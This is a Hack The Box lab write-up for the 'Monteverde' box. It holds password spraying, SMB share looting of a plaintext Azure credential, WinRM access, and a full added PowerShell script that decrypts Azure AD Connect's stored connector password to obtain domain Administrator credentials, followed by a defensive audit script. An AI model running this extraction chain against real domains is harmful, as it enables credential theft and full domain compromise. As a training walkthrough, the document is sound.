CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:Guest STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:AAD_987d7f2f57d2 STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [-] MEGABANK\SABatchJobs:mhope STATUS_LOGON_FAILURE
CME monteverde.htb:445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJobs
[*] KTHXBYE!
Looks like the approach was right even though the first list failed.
As it turns out, the service account SABatchJobs was created with its own name as its password; the lazy-administrator approach. Note that crackmapexec stopped at the first valid credential, so the accounts after SABatchJobs in the list were never tested.
Let's try and validate the access this account has:
user@kali:~/Documents/HTB-Labs/Monteverde$ crackmapexec monteverde.htb -u SABatchJobs -p SABatchJobs --shares
CME monteverde.htb:445 MONTEVERDE [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK)
CME monteverde.htb:445 MONTEVERDE [+] MEGABANK\SABatchJobs:SABatchJobs
CME monteverde.htb:445 MONTEVERDE [+] Enumerating shares
CME monteverde.htb:445 MONTEVERDE SHARE Permissions
CME monteverde.htb:445 MONTEVERDE ----- -----------
CME monteverde.htb:445 MONTEVERDE users$ READ
CME monteverde.htb:445 MONTEVERDE ADMIN$ NO ACCESS
CME monteverde.htb:445 MONTEVERDE IPC$ READ
CME monteverde.htb:445 MONTEVERDE azure_uploads READ
CME monteverde.htb:445 MONTEVERDE E$ NO ACCESS
CME monteverde.htb:445 MONTEVERDE SYSVOL READ
CME monteverde.htb:445 MONTEVERDE C$ NO ACCESS
CME monteverde.htb:445 MONTEVERDE NETLOGON READ
[*] KTHXBYE!
This last run tells us which shares we can read as SABatchJobs: users$, azure_uploads, SYSVOL, NETLOGON and IPC$.
Another way would have been smbmap:
user@kali:~/Documents/HTB-Labs/Monteverde$ smbmap -H monteverde.htb -u SABatchJobs -p SABatchJobs -d MEGABANK
[+] IP: monteverde.htb:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
azure_uploads READ ONLY
C$ NO ACCESS Default share
E$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
users$ READ ONLY
At this point, we can try accessing these shares:
user@kali:~/Documents/HTB-Labs/Monteverde$ impacket-smbclient MEGABANK/SABatchJobs:SABatchJobs@monteverde.htb
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# ls
[-] No share selected
# use users$
# ls
drw-rw-rw- 0 Fri Jan 3 08:12:48 2020 .
drw-rw-rw- 0 Fri Jan 3 08:12:48 2020 ..
drw-rw-rw- 0 Fri Jan 3 08:15:23 2020 dgalanos
drw-rw-rw- 0 Fri Jan 3 08:41:18 2020 mhope
drw-rw-rw- 0 Fri Jan 3 08:14:56 2020 roleary
drw-rw-rw- 0 Fri Jan 3 08:14:28 2020 smorgan
# cd mhope
# ls
drw-rw-rw- 0 Fri Jan 3 08:41:18 2020 .
drw-rw-rw- 0 Fri Jan 3 08:41:18 2020 ..
-rw-rw-rw- 1212 Fri Jan 3 09:59:24 2020 azure.xml
# get azure.xml
# cd ../roleary
# ls
drw-rw-rw- 0 Fri Jan 3 08:14:56 2020 .
drw-rw-rw- 0 Fri Jan 3 08:14:56 2020 ..
# cd ../smorgan
# ls
drw-rw-rw- 0 Fri Jan 3 08:14:28 2020 .
drw-rw-rw- 0 Fri Jan 3 08:14:28 2020 ..
# cd ../dgalanos
# ls
drw-rw-rw- 0 Fri Jan 3 08:15:23 2020 .
drw-rw-rw- 0 Fri Jan 3 08:15:23 2020 ..
#
user@kali:~/Documents/HTB-Labs/Monteverde$ cat azure.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
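The file is a PowerShell CLIXML export (what Export-Clixml writes) of a PSADPasswordCredential object, which is why the property names sit in N attributes and the document starts with a UTF-16 BOM that cat renders as two garbage characters. On a Windows box Import-Clixml would rebuild the object; on Kali the following added example (not code from the original write-up) parses the format directly: it detects the BOM, walks every Obj in the PowerShell namespace, collects its type names and Props, and flags any property whose name looks like a secret. The sample document is constructed to mirror azure.xml above, with a placeholder password, and is encoded as UTF-16 with a BOM the way Export-Clixml does it.

```python
"""Extract credential properties from a PowerShell CLIXML (Export-Clixml) file.

Added example, not part of the original write-up. SAMPLE_BYTES is a
constructed document mirroring the structure of azure.xml above, with a
placeholder password, encoded as UTF-16 with BOM like Export-Clixml output.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Tuple

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"

SAMPLE_XML = """\
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">Placeholder-Secret-1</S>
    </Props>
  </Obj>
</Objs>
"""
SAMPLE_BYTES = SAMPLE_XML.encode("utf-16")  # Python's utf-16 codec prepends a BOM


def decode_clixml(raw: bytes) -> str:
    """Decode the file by its BOM: UTF-16 (either endianness), UTF-8 with BOM, or plain UTF-8."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")  # the BOM selects the byte order and is stripped
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw.decode("utf-8-sig")
    return raw.decode("utf-8")


def parse_clixml_objects(text: str) -> List[Dict]:
    """Return one {"types": [...], "props": {N: text}} per <Obj> in the document."""
    root = ET.fromstring(text)
    objects = []
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        types = [t.text or "" for t in obj.findall(f"{{{PS_NS}}}TN/{{{PS_NS}}}T")]
        props: Dict[str, Optional[str]] = {}
        props_node = obj.find(f"{{{PS_NS}}}Props")
        if props_node is not None:
            for child in props_node:  # <S>, <DT>, <G>, <I32>... all carry an N attribute
                props[child.get("N", "")] = child.text
        objects.append({"types": types, "props": props})
    return objects


def find_secrets(objects: List[Dict],
                 keys: Tuple[str, ...] = ("password", "secret", "key", "token")) -> List[Tuple[Optional[str], str, str]]:
    """Return (object type, property name, value) for non-empty properties that look like secrets."""
    hits = []
    for obj in objects:
        type_name = obj["types"][0] if obj["types"] else None
        for name, value in obj["props"].items():
            if value and any(k in name.lower() for k in keys):
                hits.append((type_name, name, value))
    return hits


if __name__ == "__main__":
    for type_name, name, value in find_secrets(parse_clixml_objects(decode_clixml(SAMPLE_BYTES))):
        print(f"{type_name}: {name} = {value}")
```

Against the real file: `find_secrets(parse_clixml_objects(decode_clixml(open("azure.xml", "rb").read())))`. The "key" match is deliberately loose; KeyId above is excluded only because its value is the all-zero GUID, which is why the match is on the name and the value is printed for a human to judge.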
Let's try this password with evil-winrm as mhope: the file came from mhope's folder, and per enum4linux mhope is the only regular user (not built-in, not a service account) in Azure Admins. The group list also included Remote Management Users, whose members we could not resolve, so WinRM access is worth testing directly.
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
user@kali:~/Documents/HTB-Labs/Monteverde$ evil-winrm -i monteverde.htb -u mhope -p '4n0therD4y@n0th3r$' -s ./ps1_scripts/ -e ./exe_files/
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>
cd ../Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> ls
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> Get-Content -Path .\user.txt
496197********************f212f2
We have found the user flag. At this point, we can try to escalate our privileges.
From the services, groups and accounts enumerated so far (the ADSync* groups, the AAD_ sync service account and the SQL Browser group), this domain controller most likely runs Azure AD Connect syncing to an Azure tenant, along with the AzureRM context and TokenCache.dat files found under mhope's profile.
Azure AD Connect keeps the credentials of the on-premises account it syncs with, encrypted, in its ADSync database, so this points us at the known Azure AD Connect / ADSync credential-extraction technique to recover the administrator account password.
Remember to check the PowerShell execution policy before running any script. Since we are in a PowerShell session over WinRM, we can use the built-in cmdlets directly.
To list the execution policy for every scope:
Get-ExecutionPolicy -List
To change it for the current user:
Set-ExecutionPolicy Bypass -Scope CurrentUser
Without -Scope the change targets LocalMachine and fails if the user does not have administrator rights. The execution policy is not a security boundary, only a guard against running scripts by accident; -Scope Process is enough for a one-off script.
Following the blog Azure AD Connect for RedTeamers referenced in the overview section led to a failed first attempt. The error below is telling: the POC script's connection string targets the LocalDB instance that Azure AD Connect installs by default, and "Error Locating Server/Instance Specified" means no such instance is reachable here. Together with the SQLServer2005SQLBrowserUser$MONTEVERDE group found earlier, that suggests the ADSync database on this host lives in a full SQL Server instance, so the connection string has to be adjusted to the instance actually in use.
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload ./ps1_scripts/azuread_decrypt_msol.ps1
Info: Uploading ./ps1_scripts/azuread_decrypt_msol.ps1 to C:\Users\mhope\Downloads\azuread_decrypt_msol.ps1
Data: 2328 bytes of 2328 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> Get-ExecutionPolicy -List
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Undefined
CurrentUser Undefined
LocalMachine RemoteSigned
*Evil-WinRM* PS C:\Users\mhope\Downloads> Set-ExecutionPolicy Bypass -Scope CurrentUser
*Evil-WinRM* PS C:\users\mhope\Downloads> .\azuread_decrypt_msol.ps1
AD Connect Sync Credential Extract POC (@_xpn_)
powershell.exe : Exception calling "Open" with "0" argument(s): "A network-related or instance-specific error
+ CategoryInfo : NotSpecified: (Exception calli...specific error :String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
occurred while establishing a connection to SQL Server. The server was not found or was not
accessible. Verify that the instance name is correct and that SQL Server is configured to allow
remote connections. (provider: SQL Network Interfaces, error: 26 - Error Locating Server/Instance
Specified)"
At C:\users\mhope\Downloads\shell.ps1:4 char:1
+ $client.Open()
+ ~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : SqlException
Exception calling "ExecuteReader" with "0" argument(s): "ExecuteReader requires an open and
available Connection. The connection's current state is closed."
At C:\users\mhope\Downloads\shell.ps1:7 char:1
+ $reader = $cmd.ExecuteReader()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : InvalidOperationException
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:8 char:1
+ $reader.Read() | Out-Null
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:9 char:1
+ $key_id = $reader.GetInt32(0)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:10 char:1
+ $instance_id = $reader.GetGuid(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:11 char:1
+ $entropy = $reader.GetGuid(2)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:12 char:1
+ $reader.Close()
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Exception calling "ExecuteReader" with "0" argument(s): "ExecuteReader requires an open and
available Connection. The connection's current state is closed."
At C:\users\mhope\Downloads\shell.ps1:16 char:1
+ $reader = $cmd.ExecuteReader()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : InvalidOperationException
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:17 char:1
+ $reader.Read() | Out-Null
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:18 char:1
+ $config = $reader.GetString(0)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:19 char:1
+ $crypted = $reader.GetString(1)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At C:\users\mhope\Downloads\shell.ps1:20 char:1
+ $reader.Close()
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
Cannot convert argument "guidEntropy", with value: "", for "LoadKeySet" to type "System.Guid":
"Cannot convert null to type "System.Guid"."
At C:\users\mhope\Downloads\shell.ps1:24 char:1
+ $km.LoadKeySet($entropy, $instance_id, $key_id)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
Unhandled Exception: System.AccessViolationException: Attempted to read or write protected memory. This is often an indication that other memory is corrupt.
at CKeyManager.GetActiveCredentialKey(CKeyManager* , CKey** )
at Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager.GetActiveCredentialKey(Key& ppkey)
at CallSite.Target(Closure , CallSite , Object , PSReference )
at System.Dynamic.UpdateDelegates.UpdateAndExecute2[T0,T1,TRet](CallSite site, T0 arg0, T1 arg1)
at System.Management.Automation.Interpreter.DynamicInstruction`3.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.Interpreter.Run(InterpretedFrame frame)
at System.Management.Automation.Interpreter.LightLambda.RunVoid1[T0](T0 arg0)
at System.Management.Automation.DlrScriptCommandProcessor.RunClause(Action`1 clause, Object dollarUnderbar, Object inputToProcess)
at System.Management.Automation.DlrScriptCommandProcessor.Complete()
at System.Management.Automation.CommandProcessorBase.DoComplete()
at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(CommandProcessorBase commandRequestingUpstreamCommandsToStop)
at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(Object input)
at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
at System.Threading.ExecutionContext.RunInternal(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state, Boolean preserveSyncCtx)
at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, ContextCallback callback, Object state)
at System.Threading.ThreadHelper.ThreadStart()
Basically, the SQL connection failed: error 26 means the client could not even locate the instance named in the connection string, and every later error is just a consequence of the closed connection. The POC targets the LocalDB instance that Azure AD Connect creates in a default installation, but on this box the ADSync database is hosted on a full SQL Server instance, so the connection string has to point at it. We changed the connection from:
$client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
to the following (the server address has to be a quoted string; Database and Initial Catalog are synonyms, so the second one is redundant but harmless):
$server = "127.0.0.1"; $db = "ADSync"; $client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList "Server=$server; Database=$db; Initial Catalog=$db; Integrated Security=True;"
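The following script is an added example, not the original POC and not something from the write-up: it performs the same extraction steps (the two queries and the mcrypt.dll KeyManager calls described in Adam Chester's post), but instead of a hard-coded connection string it probes for the ADSync database, so it works whether Azure AD Connect was installed with LocalDB or, as here, against a full SQL Server instance. The registry values under the ADSync service key (Server, SQLInstance, DBName) are an assumption about where the installer records the database location; if that key is missing the script simply falls back to the two connection strings seen above. It assumes the default install path for mcrypt.dll and that it runs, in a session like the Evil-WinRM one above, as a user allowed to read the ADSync database.

```powershell
# Added example (not the page's or @_xpn_'s script): locate the ADSync database,
# read the key identifiers and the AD connector's encrypted credential, decrypt.

function Get-ADSyncConnection {
    # Candidate connection strings, tried in order. The registry values are an
    # ASSUMPTION about where Azure AD Connect records its database; the two
    # fixed fallbacks cover a LocalDB install and a local full SQL Server.
    $candidates = @()
    $params = 'HKLM:\SYSTEM\CurrentControlSet\Services\ADSync\Parameters'
    if (Test-Path $params) {
        $p = Get-ItemProperty -Path $params
        if ($p.Server) {
            $src = if ($p.SQLInstance) { "$($p.Server)\$($p.SQLInstance)" } else { $p.Server }
            $dbn = if ($p.DBName) { $p.DBName } else { 'ADSync' }
            $candidates += "Server=$src;Database=$dbn;Integrated Security=True;Connect Timeout=5"
        }
    }
    $candidates += 'Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync;Integrated Security=True;Connect Timeout=5'
    $candidates += 'Server=127.0.0.1;Database=ADSync;Integrated Security=True;Connect Timeout=5'

    foreach ($cs in $candidates) {
        $client = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $cs
        try {
            $client.Open()
            Write-Host "[*] Connected using: $cs"
            return $client
        } catch {
            # Error 26 (instance not found) lands here; keep trying the next one.
            Write-Host "[-] Failed: $cs ($(($_.Exception.Message -split "`n")[0]))"
        }
    }
    throw 'Could not open the ADSync database with any candidate connection string.'
}

function Invoke-ScalarRow {
    param([System.Data.SqlClient.SqlConnection]$Conn, [string]$Query)
    # Run a query expected to return one row and return its column values as an
    # array, closing the reader even when the query fails.
    $cmd = $Conn.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    try {
        if (-not $reader.Read()) { throw "Query returned no rows: $Query" }
        $values = New-Object object[] $reader.FieldCount
        [void]$reader.GetValues($values)
        return ,$values
    } finally {
        $reader.Close()
    }
}

$conn = Get-ADSyncConnection

# Key set id, instance id and per-install entropy (same table/columns as the POC).
$row = Invoke-ScalarRow $conn 'SELECT keyset_id, instance_id, entropy FROM mms_server_configuration'
$keyId = [int]$row[0]; $instanceId = [guid]$row[1]; $entropy = [guid]$row[2]

# The AD connector's plaintext XML (domain and user) and its encrypted credential blob.
$row = Invoke-ScalarRow $conn "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$config = [string]$row[0]; $crypted = [string]$row[1]
$conn.Close()

# Decrypt with the KeyManager shipped in mcrypt.dll (default install path assumed).
Add-Type -Path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instanceId, $keyId)
$key = $null;       $km.GetActiveCredentialKey([ref]$key)
$key2 = $null;      $km.GetKey(1, [ref]$key2)
$decrypted = $null; $key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain   = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-domain']").Node.InnerXml
$username = (Select-Xml -Content $config    -XPath "//parameter[@name='forest-login-user']").Node.InnerXml
$password = (Select-Xml -Content $decrypted -XPath "//attribute").Node.InnerXml
Write-Host "Domain: $domain`nUsername: $username`nPassword: $password"
```

Upload it with Evil-WinRM's upload command and run it exactly like the POC; the first lines printed tell you which connection string actually worked, which is the information the failed attempt above was missing.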
Now, our second attempt after updating the uploaded script:
*Evil-WinRM* PS C:\Users\mhope\Downloads> upload ./ps1_scripts/azuread_decrypt_msol2.ps1
Info: Uploading ./ps1_scripts/azuread_decrypt_msol2.ps1 to C:\Users\mhope\Downloads\azuread_decrypt_msol2.ps1
Data: 2404 bytes of 2404 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\mhope\Downloads> Get-ExecutionPolicy -List
Scope ExecutionPolicy
----- ---------------
MachinePolicy Undefined
UserPolicy Undefined
Process Undefined
CurrentUser Bypass
LocalMachine RemoteSigned
*Evil-WinRM* PS C:\Users\mhope\Downloads> .\azuread_decrypt_msol2.ps1
AD Connect Sync Credential Extract POC (@_xpn_)
Domain: MEGABANK.LOCAL
Username: administrator
Password: d0m@in4dminyeah!
We now have the Administrator credentials that Azure AD Connect had stored, so we can log in as Administrator over SMB with impacket-smbclient again:
user@kali:~/Documents/HTB-Labs/Monteverde$ impacket-smbclient MEGABANK/Administrator:"d0m@in4dminyeah!"@monteverde.htb
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Type help for list of commands
# shares
ADMIN$
azure_uploads
C$
E$
IPC$
NETLOGON
SYSVOL
users$
# use C$
# ls
drw-rw-rw- 0 Fri Jan 3 00:11:23 2020 $Recycle.Bin
drw-rw-rw- 0 Fri Jan 3 00:13:00 2020 Documents and Settings
-rw-rw-rw- 1476395008 Mon Jan 13 14:40:45 2020 pagefile.sys
drw-rw-rw- 0 Fri Jan 3 00:11:23 2020 PerfLogs
drw-rw-rw- 0 Fri Jan 3 08:28:53 2020 Program Files
drw-rw-rw- 0 Thu Jan 2 17:39:00 2020 Program Files (x86)
drw-rw-rw- 0 Fri Jan 3 07:47:44 2020 ProgramData
drw-rw-rw- 0 Fri Jan 3 00:13:02 2020 Recovery
drw-rw-rw- 0 Thu Jan 2 16:54:11 2020 System Volume Information
drw-rw-rw- 0 Fri Jan 3 08:24:36 2020 Users
drw-rw-rw- 0 Fri Jan 3 07:47:45 2020 Windows
# cd Users
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Fri Jan 3 08:48:34 2020 .
drw-rw-rw- 0 Fri Jan 3 08:48:34 2020 ..
-rw-rw-rw- 282 Thu Jan 2 17:49:01 2020 desktop.ini
-rw-rw-rw- 32 Fri Jan 3 08:48:55 2020 root.txt
# get root.txt
# exit
root@CORP-VMGD13L12:~/Documents/HTB-Labs/Monteverde# cat root.txt
129096********************04a0bc
And we have found the root flag!
This section was added on April 17, 2022 while reviewing my notes versus the approach I would have taken if I worked on this box now.
Another way to finish this box would have been to get an interactive shell as Administrator with impacket-smbexec or evil-winrm instead of only pulling the flag over SMB:
┌──(jxberrios 👿 back0ff)-[~/…/Monteverde]
└─$ evil-winrm -i monteverde.htb -u Administrator -p 'd0m@in4dminyeah!'
Evil-WinRM shell v3.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path .
Directory: C:\Users\Administrator\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 3:06 PM SQL Server Management Studio
d----- 1/2/2020 3:10 PM Visual Studio 2017
d----- 1/3/2020 5:28 AM WindowsPowerShell
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path ..\
Directory: C:\Users\Administrator
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 1/2/2020 2:49 PM 3D Objects
d-r--- 1/2/2020 2:49 PM Contacts
d-r--- 1/3/2020 5:48 AM Desktop
d-r--- 1/3/2020 5:28 AM Documents
d-r--- 5/17/2021 3:13 AM Downloads
d-r--- 1/2/2020 2:49 PM Favorites
d-r--- 1/2/2020 2:49 PM Links
d-r--- 1/2/2020 2:49 PM Music
d-r--- 1/2/2020 2:49 PM Pictures
d-r--- 1/2/2020 2:49 PM Saved Games
d-r--- 1/2/2020 2:49 PM Searches
d-r--- 1/2/2020 2:49 PM Videos
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-ChildItem -Path ..\Desktop\
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-Content -Path ..\Desktop\root.txt
129096********************04a0bc
In this scenario, Adam Chester's POC recovered the credentials Azure AD Connect uses to read the on-premises directory. Because password hash synchronisation requires directory replication rights, that account can always perform a DCSync; here it was the domain Administrator account itself, which turned the result into a full domain compromise. None of this would have worked if the server had been deployed properly: the connector account should be a dedicated, least-privilege service account rather than Administrator, the ADSync database should be readable only by the ADSync service and the administrators who manage it, and a server holding those credentials should be treated as a domain controller equivalent rather than a host that ordinary users can log into.
As Adam Chester showed in his post, new technology always carries risk, and more so when best practices are ignored. Evaluate each risk at deployment time and do not rush it.
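As an added example (not part of the original write-up), this is the audit I would run from an elevated PowerShell session on the Azure AD Connect server to check the two conditions this box relied on: which on-premises account the AD connector runs as and whether it sits in a privileged group, and which principals hold the replication rights that make a DCSync possible. It assumes the ADSync module installed with Azure AD Connect and the ActiveDirectory RSAT module are available; the ConnectorTypeName and ConnectivityParameters properties of Get-ADSyncConnector output are used as I recall them and should be treated as an assumption if your version differs.

```powershell
# Added example: audit the AD connector account and DCSync-capable principals.
# Assumes the ADSync and ActiveDirectory modules are present on this server.
Import-Module ADSync
Import-Module ActiveDirectory

# 1. Which on-prem account does the AD connector run as? It should be a dedicated
#    service account (MSOL_* style), never a Domain Admin. The property names on
#    the connector object (ConnectorTypeName, ConnectivityParameters) are an
#    ASSUMPTION; inspect Get-ADSyncConnector | Get-Member if they do not match.
$adConnector = Get-ADSyncConnector | Where-Object { $_.ConnectorTypeName -eq 'AD' }
$syncUser   = ($adConnector.ConnectivityParameters | Where-Object Name -eq 'forest-login-user').Value
$syncDomain = ($adConnector.ConnectivityParameters | Where-Object Name -eq 'forest-login-domain').Value
Write-Host "AD connector account: $syncDomain\$syncUser"

$privileged = 'Domain Admins', 'Enterprise Admins', 'Administrators'
$groups = Get-ADPrincipalGroupMembership -Identity $syncUser | Select-Object -ExpandProperty Name
$hits = $groups | Where-Object { $privileged -contains $_ }
if ($hits) {
    Write-Warning "Connector account is a member of: $($hits -join ', ')"
} else {
    Write-Host "Connector account holds no built-in privileged group membership."
}

# 2. Who can DCSync? List Allow ACEs on the domain head that grant the replication
#    extended rights (or GenericAll, which implies them). Anything beyond the domain
#    controllers, Administrators and the connector account needs an explanation.
$replRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$domainDn = (Get-ADDomain).DistinguishedName
$acl = Get-Acl -Path "AD:\$domainDn"
$acl.Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($replRights.ContainsKey($_.ObjectType.ToString()) -or $_.ActiveDirectoryRights -eq 'GenericAll')
    } |
    Select-Object @{ n = 'Principal'; e = { $_.IdentityReference } },
                  @{ n = 'Right'; e = {
                      if ($replRights.ContainsKey($_.ObjectType.ToString())) { $replRights[$_.ObjectType.ToString()] }
                      else { 'GenericAll (implies replication rights)' } } } |
    Sort-Object Principal, Right |
    Format-Table -AutoSize
```

On a box configured like this one the first check flags the connector account immediately, and the second lists it among the principals that can replicate the directory, which is exactly what an attacker holding its password gets to do.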